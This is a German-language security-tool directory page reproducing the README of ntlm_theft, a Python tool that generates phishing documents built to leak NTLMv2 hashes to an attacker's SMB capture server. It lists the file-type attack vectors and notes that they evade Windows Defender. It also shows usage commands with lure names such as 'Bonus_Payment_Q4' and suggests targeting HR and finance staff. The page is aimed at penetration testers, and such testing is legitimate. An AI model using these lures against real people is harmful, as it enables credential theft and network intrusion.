Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ntlm_theft — Ein Werkzeug zum Erzeugen mehrerer Arten von NTLMv2-Hash-Diebstahldateien von Jacob Wilkin (Greenwolf) | Kitploit
Tools/GitHubGitHub/greenwolf/ntlm_theft
Phishing-ToolsPasswortangriffeInformationsbeschaffungPenetrationstestsRed Teaming
GitHubgreenwolf/ntlm_theft

ntlm_theft

Ein Werkzeug zum Erzeugen mehrerer Arten von NTLMv2-Hash-Diebstahldateien von Jacob Wilkin (Greenwolf)

Repository anzeigen
1.5k17417vor 7h 39mVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

ntlm_theft

Ein Tool zum Generieren mehrerer Arten von NTLMv2-Hash-Diebstahldateien.

ntlm_theft ist ein Open-Source-Python3-Tool, das 21 verschiedene Arten von Hash-Diebstahldokumenten generiert. Diese können für Phishing verwendet werden, wenn das Ziel entweder SMB-Datenverkehr außerhalb seines Netzwerks zulässt oder wenn Sie sich bereits im internen Netzwerk befinden.

Die Vorteile dieser Dateitypen gegenüber beispielsweise Makro-basierten Dokumenten oder Exploit-Dokumenten liegen darin, dass alle mit „beabsichtigter Funktionalität“ erstellt werden. Keine wurden von Windows Defender Antivirus im Juni 2020 gekennzeichnet, und 17 der 21 Angriffe funktionierten auf einem vollständig gepatchten Windows 10-Host.

ntlm_theft unterstützt die folgenden Angriffstypen:

  • Browse to Folder Containing
    • .url – über URL-Feld
    • .url – über ICONFILE-Feld
    • .lnk - über icon_location-Feld
    • .scf – über ICONFILE-Feld (Funktioniert nicht unter neustem Windows)
    • autorun.inf über OPEN-Feld (Funktioniert nicht unter neustem Windows)
    • desktop.ini - über IconResource-Feld (Funktioniert nicht unter neustem Windows)
  • Dokument öffnen
    • .xml – über externes Stylesheet von Microsoft Word
    • .xml – über includepicture-Feld von Microsoft Word
    • .htm – über Chrome & IE & Edge img src (nur bei lokalem Öffnen, nicht gehostet)
    • .docx – über includepicture-Feld von Microsoft Word
    • .docx – über externe Vorlage von Microsoft Word
    • .docx – über frameset webSettings von Microsoft Word
    • .xlsx - über externe Zelle von Microsoft Excel
    • .wax – über Windows Media Player-Playlist (Besser, primäres Öffnen)
    • .asx – über Windows Media Player-Playlist (Besser, primäres Öffnen)
    • .m3u – über Windows Media Player-Playlist (Schlechter, Win10 öffnet zuerst in Groovy)
    • .jnlp – über externes Java-JAR
    • .application – über jeden Browser (Muss über einen Browser bereitgestellt werden, sonst wird es nicht ausgeführt)
  • Dokument öffnen und Popup akzeptieren
    • .pdf – über Adobe Acrobat Reader
  • Link in Chat-Programm klicken
    • .txt – formatierter Link zum Einfügen in Zoom-Chat

Anwendungsfälle (Warum Sie dies ausführen möchten)

ntlm_theft ist in erster Linie für Penetrationstester und Red Teams gedacht, die es für internes Phishing bei Mitarbeitern des Zielunternehmens oder zum Massentesten von Antiviren- und E-Mail-Gateways verwenden. Es kann auch für externes Phishing verwendet werden, wenn ausgehender SMB-Zugriff auf der Perimeter-Firewall erlaubt ist.

Ich fand es nützlich, während Penetrationstests schnell zu sehen, welche Dateitypen mir zur Verfügung stehen, anstatt Zeit mit der Konfiguration eines spezifischen Angriffs zu verbringen, wie es bei Red-Team-Einsätzen üblich wäre. Sie könnten eine .rtf- oder .docx-Datei an die Personalabteilung und eine .xlsx-Tabelle an die Finanzabteilung senden.

Erste Schritte

Diese Anleitung zeigt Ihnen die Voraussetzungen und die Verwendung von ntlm_theft.

Voraussetzungen

ntlm_theft benötigt Python3 und xlsxwriter:

root@kitploit:~
pip3 install xlsxwriter

Erforderliche Parameter

Um das Tool zu starten, müssen 4 Parameter angegeben werden: ein Eingabeformat, die Eingabedatei oder der Eingabeordner und der grundlegende Ausführungsmodus:

root@kitploit:~
-g, --generate	: Wählen Sie, ob alle Dateien oder ein bestimmter Dateityp generiert werden sollen
-s, --server 	: Die IP-Adresse Ihres SMB-Hash-Erfassungsservers (Responder, impacket ntlmrelayx, Metasploit auxiliary/server/capture/smb, usw.)
-f, --filename	: Der Basisdateiname ohne Erweiterung, kann später umbenannt werden (z.B. test, Board-Meeting2020, Bonus_Payment_Q4)

Beispielausführungen

Hier ist ein Beispiel für eine Ausführung, die alle Dateien generiert:

root@kitploit:~
# python3 ntlm_theft.py -g all -s 127.0.0.1 -f test
Created: test/test.scf (BROWSE)
Created: test/test-(url).url (BROWSE)
Created: test/test-(icon).url (BROWSE)
Created: test/test.rtf (OPEN)
Created: test/test-(stylesheet).xml (OPEN)
Created: test/test-(fulldocx).xml (OPEN)
Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: test/test-(includepicture).docx (OPEN)
Created: test/test-(remotetemplate).docx (OPEN)
Created: test/test-(frameset).docx (OPEN)
Created: test/test.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: test/test.asx (OPEN)
Created: test/test.jnlp (OPEN)
Created: test/test.application (DOWNLOAD AND OPEN)
Created: test/test.pdf (OPEN AND ALLOW)
Created: test/zoom-attack-instructions.txt (PASTE TO CHAT)
Generation Complete.

Beispielausführung

Hier ist ein Beispiel für eine Ausführung, die nur moderne Dateien generiert:

root@kitploit:~
# python3 ntlm_theft.py -g modern -s 127.0.0.1 -f meeting
Skipping SCF as it does not work on modern Windows
Created: meeting/meeting-(url).url (BROWSE TO FOLDER)
Created: meeting/meeting-(icon).url (BROWSE TO FOLDER)
Created: meeting/meeting.rtf (OPEN)
Created: meeting/meeting-(stylesheet).xml (OPEN)
Created: meeting/meeting-(fulldocx).xml (OPEN)
Created: meeting/meeting.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: meeting/meeting-(includepicture).docx (OPEN)
Created: meeting/meeting-(remotetemplate).docx (OPEN)
Created: meeting/meeting-(frameset).docx (OPEN)
Created: meeting/meeting-(externalcell).xlsx (OPEN)
Created: meeting/meeting.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: meeting/meeting.asx (OPEN)
Created: meeting/meeting.jnlp (OPEN)
Created: meeting/meeting.application (DOWNLOAD AND OPEN)
Created: meeting/meeting.pdf (OPEN AND ALLOW)
Skipping zoom as it does not work on the latest versions
Skipping Autorun.inf as it does not work on modern Windows
Skipping desktop.ini as it does not work on modern Windows
Generation Complete.

Hier ist ein Beispiel für eine Ausführung, die nur eine xlsx-Datei generiert:

root@kitploit:~
# python3 ntlm_theft.py -g xlsx -s 192.168.1.103 -f Bonus_Payment_Q4
Created: Bonus_Payment_Q4/Bonus_Payment_Q4-(externalcell).xlsx (OPEN)
Generation Complete.

Autoren

  • Jacob Wilkin - Forschung und Entwicklung

Lizenz

ntlm_theft Erstellt von Jacob Wilkin Copyright (C) 2020 Jacob Wilkin

Dieses Programm ist freie Software: Sie können es weiterverbreiten und/oder modifizieren unter den Bedingungen der GNU General Public License, wie von der Free Software Foundation veröffentlicht, entweder Version 3 der Lizenz oder (nach Ihrer Wahl) jeder späteren Version.

Dieses Programm wird in der Hoffnung bereitgestellt, dass es nützlich sein wird, aber OHNE JEGLICHE GEWÄHRLEISTUNG; sogar ohne die implizite Gewährleistung der MARKTGÄNGIGKEIT oder EIGNUNG FÜR EINEN BESTIMMTEN ZWECK. Siehe die GNU General Public License für weitere Details.

Danksagungen

  • Ired
  • Securify
  • Pentestlab
  • deepzec
  • rocketscientist911
  • Osanda
  • Violation Industry
  • @kazkansouh - Hinzufügen von .lnk-Unterstützung
Tool herunterladen